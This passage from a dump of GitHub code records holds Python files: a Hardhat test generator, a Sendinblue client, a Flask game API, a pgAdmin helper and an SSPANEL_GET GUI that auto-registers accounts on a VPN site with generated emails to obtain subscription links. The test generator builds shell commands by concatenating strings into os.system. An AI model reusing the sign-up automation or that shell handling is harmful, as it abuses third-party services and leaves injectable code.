shutil\nimport subprocess\nimport OpenFile\n\npath = \"/home/yantong/Code/ScapyEtherscan/convertFileToPart\"\nhardhat_workingspace = \"/home/yantong/Code/hardhatTest\"\norigin_path = os.getcwd()\n\n\ndef deleteDirFiles(dir_path):\n for filename in os.listdir(dir_path):\n file_path = os.path.join(dir_path, filename)\n if os.path.isfile(file_path):\n os.remove(file_path)\n\n\ndef copyFile(dirname):\n deleteDirFiles(hardhat_workingspace + \"/contracts\")\n filename = os.listdir(path + \"/sol_contents/\" + dirname)[0]\n os.system(\"cp \" + path + \"/sol_contents/\" + dirname + \"/\" + filename + \" /home/yantong/Code/hardhatTest/contracts/\" + filename)\n return filename\n\n\ndef collectMessage(jsonStr):\n jsonStr = json.loads(jsonStr)\n result = []\n\n for j in range(0, len(jsonStr['types'])):\n types = jsonStr['types'][j]\n _input = jsonStr['inputs'][j]\n if types == 'address':\n if _input.find(\"0x\") == -1:\n result.append(\"\\\"0x\" + _input + \"\\\"\")\n else:\n result.append(\"\\\"\" + _input + \"\\\"\")\n elif types.find(\"uint\") != -1:\n if types.find(\"[\") == -1:\n if isinstance(_input,dict):\n result.append(\"\\\"\" + _input['hex'] + \"\\\"\")\n else:\n result.append(\"\\\"\" + str(_input) + \"\\\"\")\n else:\n tmp = []\n for it in _input:\n if isinstance(it,dict):\n tmp.append(\"\\\"\" + it['hex'] + \"\\\"\")\n else:\n tmp.append(\"\\\"\" + str(it) + \"\\\"\")\n result.append(\"[\" + \",\".join(tmp) + \"]\")\n elif types.find(\"[\") != -1:\n tmp = []\n for it in _input:\n if isinstance(it,bool):\n tmp.append(str(int(it)))\n else:\n if isinstance(it,list):\n if len(it) == 0:\n tmp.append(\"[]\")\n else:\n tmp.append(str(it))\n else:\n tmp.append(\"\\\"\" + it + \"\\\"\")\n result.append(\"[\" + \",\".join(tmp) + \"]\")\n elif types == \"bool\":\n result.append(str(int(_input)))\n else:\n if isinstance(_input,dict):\n result.append(\"\\\"\" + _input['hex'] + \"\\\"\")\n elif isinstance(_input,list):\n _input = [f'\"{item}\"' for item in _input]\n result.append(\"[\" + \",\".join(_input) + \"]\")\n else:\n result.append(\"\\\"\" + _input + \"\\\"\")\n return \",\".join(result)\n\n\ndef collectConstructorArgument(jsonStr):\n jsonStr = json.loads(jsonStr)\n result = []\n if '__length__' not in jsonStr:\n print(json.dumps(jsonStr))\n return \"\"\n length = jsonStr['__length__']\n for j in range(0, int(length)):\n if isinstance(jsonStr[str(j)], list):\n jsonStr[str(j)] = [f'\"{item}\"' for item in jsonStr[str(j)]]\n result.append(\"[\" + \",\".join(jsonStr[str(j)]) + \"]\")\n elif isinstance(jsonStr[str(j)],bool):\n result.append(str(int(jsonStr[str(j)])))\n else:\n if jsonStr[str(j)] is None:\n result.append(\"\\\"\\\"\")\n else:\n result.append(\"\\\"\" + jsonStr[str(j)] + \"\\\"\")\n result = \",\".join(result)\n return result\n\n\ndef generateScript():\n result = \"const {{expect}} = require(\\\"\"\"chai\\\"\"\");\\n\" \\\n \"const {{loadFixture}} = require(\\\"\"\"@nomicfoundation/hardhat-network-helpers\\\"\"\");\\n\" \\\n \"const web3 = require(\\\"\"\"web3\\\"\"\");\\n\\n\" \\\n \"describe(\\\"\"\"{contract_name}\\\"\"\",function(){{\\n\"\n result += \"\\tasync function deployOneYearLockFixture(){{\\n\" \\\n \"\\t\\tconst _Contract = await ethers.getContractFactory(\\\"\"\"{contract_name}\\\"\"\");\\n\" \\\n \"\\t\\tconst [account0,account1,account2] = await ethers.getSigners();\\n\" \\\n \"\\t\\tconst _contract = await _Contract.deploy({constructor_argument});\\n\" \\\n \"\\t\\treturn {{_contract,account0,account1,account2}};\" \\\n \"\\n\\t}}\\n\\n\"\n result += 
\"\\tdescribe(\\\"{function_name}\\\",function(){{\\n\" \\\n \"\\t\\tit(\\\"\"\"testing {function_name}\\\"\"\",async function(){{\\n\" \\\n \"\\t\\t\\tconst {{_contract,account0,account1,account2}} = await loadFixture(deployOneYearLockFixture);\\n\" \\\n \"\\t\\t\\tawait _contract.connect({account}).{function_name}({contract_input});\\n\" \\\n \"\\t\\t}});\\n\" \\\n \"\\t}});\\n\" \\\n \"}});\"\n\n return result\n\n\ndef modifyHardhatConfig(compile_version):\n config_str = OpenFile.openFileByString(hardhat_workingspace + \"/hardhat.config.js\")\n pattern = r'(?<=\\{version:\")[0-9.]+(?=\"})'\n # replace the old compiler version number with the new one\n config_str = re.sub(pattern, compile_version, config_str)\n return config_str\n\n\ndef testCollectMessage(dirname):\n # constructor_argument = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/constructor_arguments.json\")\n # print(constructor_argument)\n # constructor_inputs = collectConstructorArgument(constructor_argument)\n # print(constructor_inputs)\n\n # file_input_list = os.listdir(path + \"/input_content/\" + dirname)\n # for input_info in file_input_list:\n # input_info = OpenFile.openFileByString(path + \"/input_content/\" + dirname + \"/\" + input_info)\n # print(input_info)\n # input_info = collectMessage(input_info)\n # print(input_info)\n compile_version = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/compile_version.txt\")\n print(compile_version)\n\n pattern = re.compile(r'v(\\d+\\.\\d+\\.\\d+)')\n compile_version = [m.group(1) for m in pattern.finditer(compile_version)]\n if len(compile_version) != 0:\n print(compile_version[0])\n # print(compile_version)\n # compile_version = compile_version.split(\"+\")[0][1:]\n\n\ndef init(dirname):\n deleteDirFiles(hardhat_workingspace + \"/test\")\n # read the constructor arguments and the compiler version info\n compile_version = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/compile_version.txt\")\n constructor_argument = OpenFile.openFileByString(path + \"/other_contents/\" + dirname + \"/constructor_arguments.json\")\n pattern = re.compile(r'v(\\d+\\.\\d+\\.\\d+)')\n compile_version = [m.group(1) for m in pattern.finditer(compile_version)]\n if len(compile_version) == 0:\n return 0\n compile_version = compile_version[0]\n constructor_inputs = collectConstructorArgument(constructor_argument)\n # update hardhat.config\n config_file = modifyHardhatConfig(compile_version)\n OpenFile.writeFile(hardhat_workingspace + \"/hardhat.config.js\",config_file)\n # read the recorded inputs\n filename = os.listdir(path + \"/sol_contents/\" + dirname)[0]\n file_input_list = os.listdir(path + \"/input_content/\" + dirname)\n for input_info in file_input_list:\n id = file_input_list.index(input_info)\n input_info = OpenFile.openFileByString(path + \"/input_content/\" + dirname + \"/\" + input_info)\n if input_info == '{\"method\": null, \"types\": [], \"inputs\": [], \"names\": []}':\n continue\n function_name = json.loads(input_info)['method']\n if function_name is None:\n continue\n input_info = collectMessage(input_info)\n # generate the test script from the constructor arguments and the recorded inputs\n\n scriptStr = generateScript().format(contract_name=filename[:-4],\n constructor_argument=constructor_inputs,\n function_name=function_name,\n contract_input=input_info,\n account = \"account0\")\n # account=\"account\" + str(random.randint(0,10)))\n OpenFile.writeFile(\"/home/yantong/Code/hardhatTest/test/\" + filename[:-4] + \"_\" + function_name + \"_\" + str(id) + \".js\", scriptStr)\n # print(scriptStr)\n # print(\"s\")\n\n# 
collectMessage(OpenFile.openFileByString(path+\"/input_content/0x0a16305612706b4eabce43247d61fe7fbed708e4/1.json\"))\n# tmpStr = OpenFile.openFileByString(path + \"/other_contents/0x0a6d448547c6da0ed11e10a2358ee0b4f20a8a28/constructor_arguments.json\")\ndef copyAtoB(src_folder,dst_folder):\n # walk all files and subfolders under the source folder\n for root, dirs, files in os.walk(src_folder):\n # iterate over the files in the current directory\n for _file in files:\n # source file path\n src_file_path = os.path.join(root, _file)\n # destination file path\n dst_file_path = os.path.join(dst_folder, _file)\n # copy the file into the destination folder\n shutil.copy(src_file_path, dst_file_path)\n\n\ndef execCommand(sha):\n os.chdir(hardhat_workingspace)\n # run the command\n ret = subprocess.run(\"npx hardhat coverage --temp build\",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,encoding=\"utf-8\")\n matches = re.findall(r\"✔\\s+testing\\s+(\\S+)\\s+\\((\\d+)ms\\)\", ret.stdout)\n for match in matches:\n if not os.path.exists(origin_path + \"/test suite/\" + sha):\n os.mkdir(origin_path + \"/test suite/\" + sha)\n copyAtoB(hardhat_workingspace + \"/contracts\", origin_path + \"/test suite/\" + sha)\n file_list = os.listdir(hardhat_workingspace + \"/test\")\n for _item in file_list:\n if _item.find(match[0]) != -1:\n shutil.copy(hardhat_workingspace + \"/test/\" + _item, origin_path + \"/test suite/\" + sha + \"/\" + _item)\n # print(ret.stdout)\n\n\nif __name__ == \"__main__\":\n\n with open(\"waitingList.txt\", \"r\") as file:\n dirlist = file.read().split(\"\\n\")[:-1]\n\n for i in range(1114,len(dirlist)):\n item = dirlist[i]\n print(str(i))\n # testCollectMessage(dirlist[i])\n copyFile(item)\n init(item)\n execCommand(item)","repo_name":"Ether1oop/generateTestScript","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23444077065","text":"# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).\nimport logging\nfrom odoo import tools, _\n\nimport sib_api_v3_sdk\nfrom sib_api_v3_sdk.rest import ApiException\n_logger = logging.getLogger(__name__)\n\n\nclass SendinblueWebService():\n\n    def __init__(self, company, env):\n        self.company = company\n        self.custom_env = env\n        self.api_key = tools.config.get('sendinblue_api_key')\n        configuration = sib_api_v3_sdk.Configuration()\n        configuration.api_key['api-key'] = self.api_key\n        # Uncomment below to setup prefix (e.g. 
Bearer) for API key, if needed\n # configuration.api_key_prefix['api-key'] = 'Bearer'\n # create an instance of the API class\n self.api_instance_account_api = sib_api_v3_sdk.AccountApi(\n sib_api_v3_sdk.ApiClient(configuration)\n )\n self.api_instance_contacts_api = sib_api_v3_sdk.ContactsApi(\n sib_api_v3_sdk.ApiClient(configuration)\n )\n\n # get_attributes\n def get_attributes(self):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_attributes()\n response['response'] = api_response\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n # get_folders\n def get_folders(self):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_folders(10, 0)\n response['response'] = api_response\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n # get_lists\n def get_lists(self):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_lists()\n response['response'] = api_response\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n # get_contacts\n def get_contacts(self, limit=1000):\n response = {\n 'errors': True,\n 'error': \"\",\n 'response': \"\"\n }\n try:\n api_response = self.api_instance_contacts_api.get_contacts(\n limit=10,\n offset=0\n )\n if api_response:\n pages_calculate = float(api_response.count)/float(limit)\n pages_calculate = \"{0:.2f}\".format(pages_calculate)\n pages_calculate_split = pages_calculate.split('.')\n if pages_calculate_split[1] != \"00\":\n pages_calculate = int(pages_calculate_split[0])+1\n else:\n # exact division: the page count is already whole\n pages_calculate = int(pages_calculate_split[0])\n\n response['response'] = {\n 'count': api_response.count,\n 'contacts': []\n }\n for i in range(1, pages_calculate+1):\n offset = 0\n if i > 1:\n offset = limit*i\n offset = offset-limit\n response_page = self.get_contacts_real(limit, offset)\n if response_page:\n response['response']['contacts'].extend(response_page.contacts)\n\n response['errors'] = False\n except ApiException as e:\n response['error'] = \\\n _(\"Exception when calling AccountApi->get_account: %s\") % e\n return response\n\n def get_contacts_real(self, limit, offset):\n try:\n return self.api_instance_contacts_api.get_contacts(\n limit=limit,\n offset=offset\n )\n except ApiException as e:\n return False\n","repo_name":"OdooNodrizaTech/oniad","sub_path":"oniad_sendinblue/sendinblue/web_service.py","file_name":"web_service.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1386566565","text":"import os\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom application import models\n# create and configure the application and database\napp = Flask(__name__, instance_relative_config=True)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\napp.config.from_object(os.environ['APP_SETTINGS'])\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\ndb.init_app(app)\n\nfrom . import quantum as q\nfrom . 
import player as p\n\n#************** PLAYER ENDPOINTS *****************\nplayer=p.Player()\n\n# Purpose: Creates a player in database with given highscore\n# Data contract\n# userId: str\n# hiscore: int\n# Sample JSON Body\n# {\n# \t\"userId\": \"player\",\n# \t\"hiscore\": 90\n# }\n#\n#\n# Sample response\n# {\n# \"hiscore\": 90,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/createPlayer', methods=['POST'])\ndef createPlayer():\n if request.method == 'POST':\n params=request.get_json()\n newPlayer = models.PlayerModel(params['userId'], params['hiscore'])\n response = player.createPlayer(newPlayer)\n return response\n return None\n# Purpose: Fetches a player in database with given userId\n# Data contract\n# userId: str\n# Sample request\n# [SERVER_NAME]/api/fetchPlayer?userId=player\n#\n# Sample response\n# {\n# \"hiscore\": 90,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/fetchPlayer', methods=['GET'])\ndef fetchPlayer():\n if request.method == 'GET':\n userId = request.args.get('userId', default= None, type= str)\n response = player.fetchPlayer(userId)\n return response\n return None\n\n# Purpose: Updates a player's hiscore in database from given userId and hiscore\n# Data contract\n# userId: str\n# hiscore: int\n#\n# Sample JSON body\n# {\n# \t\"userId\": \"player\",\n# \t\"hiscore\": 15\n# }\n# Sample response\n# {\n# \"hiscore\": 15,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/updateHiscore', methods=['PUT'])\ndef updateHiscore():\n if request.method == 'PUT':\n params=request.get_json()\n updatePlayer = models.PlayerModel(params['userId'], params['hiscore'])\n response = player.updateHiscore(updatePlayer)\n return response\n return None\n\n# Purpose: Deletes a player in database with given userId\n# Data contract\n# userId: str\n# Sample request\n# [SERVER_NAME]/api/deletePlayer?userId=player\n#\n#\n# Sample response\n# {\n# \"hiscore\": 15,\n# \"id\": 4,\n# \"userId\": \"player\"\n# }\n@app.route('/api/deletePlayer', methods=['DELETE'])\ndef delete():\n if request.method == 'DELETE':\n userId = request.args.get('userId', default= None, type= str)\n response = player.delete(userId)\n return response\n return None\n\n#************** QUANTUM ENDPOINTS *****************\nquantum=q.Quantum()\n\n# Purpose: Generates random integer between 0 and provided max int\n# Data contract\n# max: int\n# Sample request\n# [SERVER_NAME]/api/generateRandomNumber?max=10\n#\n#\n# Sample response\n# {\n# \"randomInt\": 2\n# }\n@app.route('/api/generateRandomNumber', methods=['GET'])\ndef generateRandomNumber():\n if request.method == 'GET':\n maxNum = request.args.get('max', default= None, type= int)\n response = quantum.generateRandomNumber(maxNum)\n return response\n return None\n\n# Purpose: Create a superposition of two piece with random types and probabilities\n# Data contract\n# NO DATA NEEDED\n#\n# Sample Request\n# [SERVER_NAME]/api/createSuperposition\n#\n# {\n# \"result\": {\n# \"piece1\": {\n# \"prob\": 0.25,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.75,\n# \"type\": 4\n# }\n# }\n# }\n#\n@app.route('/api/createSuperposition', methods=['GET'])\ndef createSuperposition():\n if request.method == 'GET':\n response = quantum.createSuperposition()\n return response\n return None\n\n# Purpose: Calculates a superposition result (0 or 1) based on given probability of 0\n# Data contract\n# prob: float (0-1)\n#\n# Sample Request\n# [SERVER_NAME]/api/determineSuperposition?prob=.60\n#\n# Sample result\n# {\n# \"result\": 0\n# 
}\n#\n@app.route('/api/determineSuperposition', methods=['GET'])\ndef determineSuperposition():\n if request.method == 'GET':\n prob = request.args.get('prob', default= None, type= float)\n response = quantum.determineSuperposition(prob)\n return response\n return None\n\n# Purpose: Applies an H gate to any given superposition piece and return a new probabilities\n# Data contract\n# prob: float (0-1)\n#\n# Sample Request\n# [SERVER_NAME]/api/applyHGate\n\n# Sample JSON Object\n# {\n# \"piece1\": {\n# \"prob\": 0.2,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.8,\n# \"type\": 4\n# }\n# }\n#\n# Sample result\n# {\n# \"result\": {\n# \"piece1\": {\n# \"prob\": 0.18,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.82,\n# \"type\": 4\n# }\n# }\n# }\n#\n@app.route('/api/applyHGate', methods=['POST'])\ndef applyHGate():\n if request.method == 'POST':\n params = request.get_json()\n response = quantum.applyHGate(params)\n return response\n return None\n\n# Purpose: Applies an X gate to any given superposition piece and return a new probabilities\n# Data contract\n# prob: float (0-1)\n#\n# Sample Request\n# [SERVER_NAME]/api/applyHGate\n\n# Sample JSON Object\n# {\n# \"piece1\": {\n# \"prob\": 0.2,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.8,\n# \"type\": 4\n# }\n# }\n#\n# Sample result\n# {\n# \"result\": {\n# \"piece1\": {\n# \"prob\": 0.8,\n# \"type\": 0\n# },\n# \"piece2\": {\n# \"prob\": 0.2,\n# \"type\": 4\n# }\n# }\n# }\n#\n@app.route('/api/applyXGate', methods=['POST'])\ndef applyXGate():\n if request.method == 'POST':\n params = request.get_json()\n response = quantum.applyXGate(params)\n return response\n return None\n\n# Purpose: Flips piece based on state\n# Data contract\n# piece: int\n# Sample request\n# [SERVER_NAME]/api/flipEntangledPiece?state=1\n#\n#\n# Sample response\n# {\n# \"result\": 0\n# }\n@app.route('/api/flipEntangledPiece', methods=['GET'])\ndef flipEntangledPiece():\n if request.method == 'GET':\n state = request.args.get('state', default= None, type= int)\n response = quantum.flipEntangledPiece(state)\n return response\n return None","repo_name":"dartmouth-cs98/Quantum-Tetris","sub_path":"server/application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"35"} +{"seq_id":"31702576159","text":"import sys\nimport threading\nimport tkinter\nfrom tkinter import messagebox\n\nfrom SSPANEL_GET import SSPANEL_GET\n\nurl = \"5.52vpn.club\"\ntok = \"b=3\"\nvcode = \"geetest\"\ngui = True if sys.platform == 'win32' else False\nisDebug = True if sys.gettrace() else False\n\n\ndef do_help():\n print(sys.argv[0], \"\"\"[选项 [值]] 或 [选项=[值]]\n -u,--url URL : 设置 URL\n -t,-token TOKEN : 设置 TOKEN\n --h,--help : 显示这个帮助\n -g,--gui : 开启图形界面\"\"\")\n quit()\n\n\ndef do_rule(new_str: str, rule=\".\"):\n \"\"\"判断字符是否存在, 不存在退出程序\"\"\"\n if rule in new_str:\n return new_str\n else:\n print(\"不符合规则: \", new_str)\n quit()\n\n\n# 开始解析\ni = 1\narg = sys.argv\nwhile i < len(arg):\n if arg[i][0] == \"-\":\n if arg[i][1] == \"-\":\n if arg[i][2:5] == \"url\":\n if len(arg[i]) > 5 and arg[i][5] == \"=\":\n # --url=(url)\n url = do_rule(arg[i][6:])\n else:\n # --url (url)\n i += 1\n url = do_rule(arg[i])\n elif arg[i][2:7] == \"token\":\n if len(arg[i]) > 7 and arg[i][7] == \"=\":\n # --token=(token)\n tok = do_rule(arg[i][8:], \"=\")\n else:\n # --token (token)\n i += 1\n tok = do_rule(arg[i], \"=\")\n elif arg[i][2:] == \"help\":\n # --help\n do_help()\n 
elif arg[i][2:] == \"gui\":\n # --gui\n gui = True\n elif arg[i][1] == \"u\":\n if len(arg[i]) > 2 and arg[i][2] == \"=\":\n # -u=(url)\n url = do_rule(arg[i][3:])\n else:\n # -u=(url)\n i += 1\n url = do_rule(arg[i])\n elif arg[i][1] == \"t\":\n if len(arg[i]) > 2 and arg[i][2] == \"=\":\n # -t=(token)\n tok = do_rule(arg[i][3:], \"=\")\n else:\n # -t (token)\n i += 1\n tok = do_rule(arg[i], \"=\")\n elif arg[i][1] == \"h\":\n do_help()\n elif arg[i][1] == \"g\":\n # -g\n gui = True\n if \".\" in arg[i]:\n url = do_rule(arg[i])\n if \"=\" in arg[i]:\n tok = do_rule(arg[i], \"=\")\n i += 1\n\nif isDebug:\n print(\"argv:\", sys.argv)\n print(\"url:\", url, end=\" \")\n print(\"token:\", tok)\n print(\"gui:\", gui)\n\n\nsspanel_get=SSPANEL_GET(url,tok,vcode)\n\n\ndef __button():\n \"\"\"获取订阅链接按钮被按下\"\"\"\n global url, tok, email_num\n url = entry_url.get()\n tok = entry_token.get()\n email_num = sspanel_get.email_num\n button.configure(state=\"disabled\")\n email_text.set(str(email_num) + '@' + sspanel_get.domain)\n # 注册\n back_reg = sspanel_get.reg()\n if back_reg == \"注册成功!正在进入登录界面\":\n button.configure(text=back_reg)\n # 登录\n back_login = sspanel_get.login()\n if back_login == \"登录成功\":\n button.configure(text=back_login)\n # 获取用户中心网页HTML\n back_user = sspanel_get.get_sub(sspanel_get.user())\n pyperclip.copy(back_user)\n url_text.set(back_user)\n \n else:\n messagebox.showerror(\"错误\", \"登录失败!\")\n button.configure(text=\"获取订阅链接\")\n else:\n messagebox.showinfo(\"注册失败\", back_reg)\n button.configure(state=\"normal\")\n\n\nif gui:\n try:\n import pyperclip\n except ImportError:\n print('[!] requests 模块未安装,请使用 pip3 install pyperclip 安装')\n sys.exit(1)\n\n root = tkinter.Tk()\n # 窗口标题\n root.title(\"订阅链接获取\")\n # 窗口大小\n root.geometry(\"245x123\")\n # 窗口图标\n # root.resizable(0, 0)\n # 窗口背景颜色\n root.configure(background=\"white\")\n\n\n def button_click():\n \"\"\"按钮点击事件\"\"\"\n threading.Thread(target=__button).start()\n\n\n # 窗口内容\n # 按钮\n button = tkinter.Button(root, text=\"获取订阅链接\", width=267, font=(\"微软雅黑\", 12), command=button_click)\n button.pack()\n\n # 标签_url\n label_url = tkinter.Label(root, text=\"订阅源\", bg=\"white\", font=(\"微软雅黑\", 10))\n label_url.place(x=6, y=37)\n # 输入框_url\n entry_url = tkinter.Entry(root, width=20, font=(\"微软雅黑\", 10))\n entry_url.insert(0, url)\n entry_url.place(x=60, y=37)\n\n # 标签_token\n label_token = tkinter.Label(root, text=\"token\", bg=\"white\", font=(\"微软雅黑\", 10))\n label_token.place(x=7, y=57)\n # 输入框_token\n entry_token = tkinter.Entry(root, width=20, font=(\"微软雅黑\", 10))\n entry_token.insert(0, tok)\n entry_token.place(x=60, y=57)\n\n # 标签_邮箱\n label_email = tkinter.Label(root, text=\"邮箱\", width=6, bg=\"white\", font=(\"微软雅黑\", 10))\n label_email.place(x=0, y=77)\n # 文本框_邮箱\n email_text = tkinter.StringVar()\n entry_email = tkinter.Entry(root, width=20, state=\"readonly\", font=(\"微软雅黑\", 12),textvariable=email_text)\n entry_email.configure(state=\"readonly\")\n entry_email.place(x=60, y=77)\n\n # 标签_订阅链接\n label_dy_url = tkinter.Label(root, text=\"订阅地址\", bg=\"white\", font=(\"微软雅黑\", 10))\n label_dy_url.place(x=0, y=97)\n # 文本框_订阅链接\n url_text = tkinter.StringVar()\n entry_dy_url = tkinter.Entry(root, width=20, state=\"readonly\", font=(\"微软雅黑\", 12),textvariable=url_text)\n entry_dy_url.configure(state=\"readonly\")\n entry_dy_url.place(x=60, y=97)\n\n root.mainloop()\nelse:\n email_num = sspanel_get.get_email()\n print(str(email_num) + \"@qs.com\")\n # 注册\n back = sspanel_get.reg()\n print(back)\n if back == \"注册成功!正在进入登录界面\":\n # 登录\n 
back = sspanel_get.login()\n print(back, end=\"\\n\\n\")\n if back == \"登录成功\":\n # 获取用户中心网页HTML\n user_back = sspanel_get.get_sub(sspanel_get.user())\n print(user_back)\n","repo_name":"Qs315490/SSPANEL_GET","sub_path":"python/GUI.pyw","file_name":"GUI.pyw","file_ext":"pyw","file_size_in_byte":6168,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"23438436049","text":"import pickle\nimport random\n\nfrom flask import Response\nfrom flask_babelex import gettext\n\nfrom config import PG_DEFAULT_DRIVER\nfrom pgadmin.tools.sqleditor.utils.apply_explain_plan_wrapper import \\\n apply_explain_plan_wrapper_if_needed\nfrom pgadmin.tools.sqleditor.utils.constant_definition import TX_STATUS_IDLE, \\\n TX_STATUS_INERROR\nfrom pgadmin.tools.sqleditor.utils.is_begin_required import is_begin_required\nfrom pgadmin.tools.sqleditor.utils.update_session_grid_transaction import \\\n update_session_grid_transaction\nfrom pgadmin.utils.ajax import make_json_response, internal_server_error\nfrom pgadmin.utils.driver import get_driver\nfrom pgadmin.utils.exception import ConnectionLost, SSHTunnelConnectionLost\n\n\nclass StartRunningQuery:\n\n def __init__(self, blueprint_object, logger):\n self.http_session = None\n self.blueprint_object = blueprint_object\n self.connection_id = str(random.randint(1, 9999999))\n self.logger = logger\n\n def execute(self, sql, trans_id, http_session, connect=False):\n session_obj = StartRunningQuery.retrieve_session_information(\n http_session,\n trans_id\n )\n if type(session_obj) is Response:\n return session_obj\n\n transaction_object = pickle.loads(session_obj['command_obj'])\n can_edit = False\n can_filter = False\n notifies = None\n if transaction_object is not None and session_obj is not None:\n # set fetched row count to 0 as we are executing query again.\n transaction_object.update_fetched_row_cnt(0)\n self.__retrieve_connection_id(transaction_object)\n\n try:\n manager = get_driver(\n PG_DEFAULT_DRIVER).connection_manager(\n transaction_object.sid)\n conn = manager.connection(did=transaction_object.did,\n conn_id=self.connection_id,\n auto_reconnect=False,\n use_binary_placeholder=True,\n array_to_string=True)\n except (ConnectionLost, SSHTunnelConnectionLost):\n raise\n except Exception as e:\n self.logger.error(e)\n return internal_server_error(errormsg=str(e))\n\n # Connect to the Server if not connected.\n if connect and not conn.connected():\n status, msg = conn.connect()\n if not status:\n self.logger.error(msg)\n return internal_server_error(errormsg=str(msg))\n\n effective_sql_statement = apply_explain_plan_wrapper_if_needed(\n manager, sql)\n\n result, status = self.__execute_query(\n conn,\n session_obj,\n effective_sql_statement,\n trans_id,\n transaction_object\n )\n\n can_edit = transaction_object.can_edit()\n can_filter = transaction_object.can_filter()\n\n # Get the notifies\n notifies = conn.get_notifies()\n else:\n status = False\n result = gettext(\n 'Either transaction object or session object not found.')\n return make_json_response(\n data={\n 'status': status, 'result': result,\n 'can_edit': can_edit, 'can_filter': can_filter,\n 'info_notifier_timeout':\n self.blueprint_object.info_notifier_timeout.get(),\n 'notifies': notifies\n }\n )\n\n def __retrieve_connection_id(self, trans_obj):\n conn_id = trans_obj.conn_id\n # if conn_id is None then we will have to create a new connection\n if conn_id is not None:\n self.connection_id = conn_id\n\n def __execute_query(self, conn, session_obj, 
sql, trans_id, trans_obj):\n # on successful connection set the connection id to the\n # transaction object\n trans_obj.set_connection_id(self.connection_id)\n\n StartRunningQuery.save_transaction_in_session(session_obj,\n trans_id, trans_obj)\n\n # If auto commit is False and transaction status is Idle\n # then call is_begin_not_required() function to check BEGIN\n # is required or not.\n\n if StartRunningQuery.is_begin_required_for_sql_query(trans_obj,\n conn, sql):\n conn.execute_void(\"BEGIN;\")\n\n # Execute sql asynchronously with params is None\n # and formatted_error is True.\n try:\n status, result = conn.execute_async(sql)\n except (ConnectionLost, SSHTunnelConnectionLost):\n raise\n\n # If the transaction aborted for some reason and\n # Auto RollBack is True then issue a rollback to cleanup.\n if StartRunningQuery.is_rollback_statement_required(trans_obj,\n conn):\n conn.execute_void(\"ROLLBACK;\")\n\n return result, status\n\n @staticmethod\n def is_begin_required_for_sql_query(trans_obj, conn, sql):\n return (not trans_obj.auto_commit and\n conn.transaction_status() == TX_STATUS_IDLE and\n is_begin_required(sql)\n )\n\n @staticmethod\n def is_rollback_statement_required(trans_obj, conn):\n return (\n conn.transaction_status() == TX_STATUS_INERROR and\n trans_obj.auto_rollback\n )\n\n @staticmethod\n def save_transaction_in_session(session, transaction_id, transaction):\n # As we changed the transaction object we need to\n # restore it and update the session variable.\n session['command_obj'] = pickle.dumps(transaction, -1)\n update_session_grid_transaction(transaction_id, session)\n\n @staticmethod\n def retrieve_session_information(http_session, transaction_id):\n if 'gridData' not in http_session:\n return make_json_response(\n success=0,\n errormsg=gettext('Transaction ID not found in the session.'),\n info='DATAGRID_TRANSACTION_REQUIRED', status=404\n )\n grid_data = http_session['gridData']\n # Return from the function if transaction id not found\n if str(transaction_id) not in grid_data:\n return make_json_response(\n success=0,\n errormsg=gettext('Transaction ID not found in the session.'),\n info='DATAGRID_TRANSACTION_REQUIRED',\n status=404\n )\n # Fetch the object for the specified transaction id.\n # Use pickle.loads function to get the command object\n return grid_data[str(transaction_id)]\n","repo_name":"SkyAI/PGAdmin4HAWQ","sub_path":"web/pgadmin/tools/sqleditor/utils/start_running_query.py","file_name":"start_running_query.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"36217754576","text":"chenn=\"5 45 123 12\"\nchenn_nan=chenn.split(\" \")\npwod=1\nfor i in chenn_nan:\n s=0\n for k in range(len(i)):\n s+=int(i[k])\n pwod*=s\nprint(pwod)\n\n \n \n \n ","repo_name":"Kalmds509/challenge-","sub_path":"enonse5.py","file_name":"enonse5.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73978145059","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\naddressToScrapeFrom = 'https://forecast.weather.gov/MapClick.php?lat=34.053570000000036&lon=-118.24544999999995'\n\npage = requests.get( 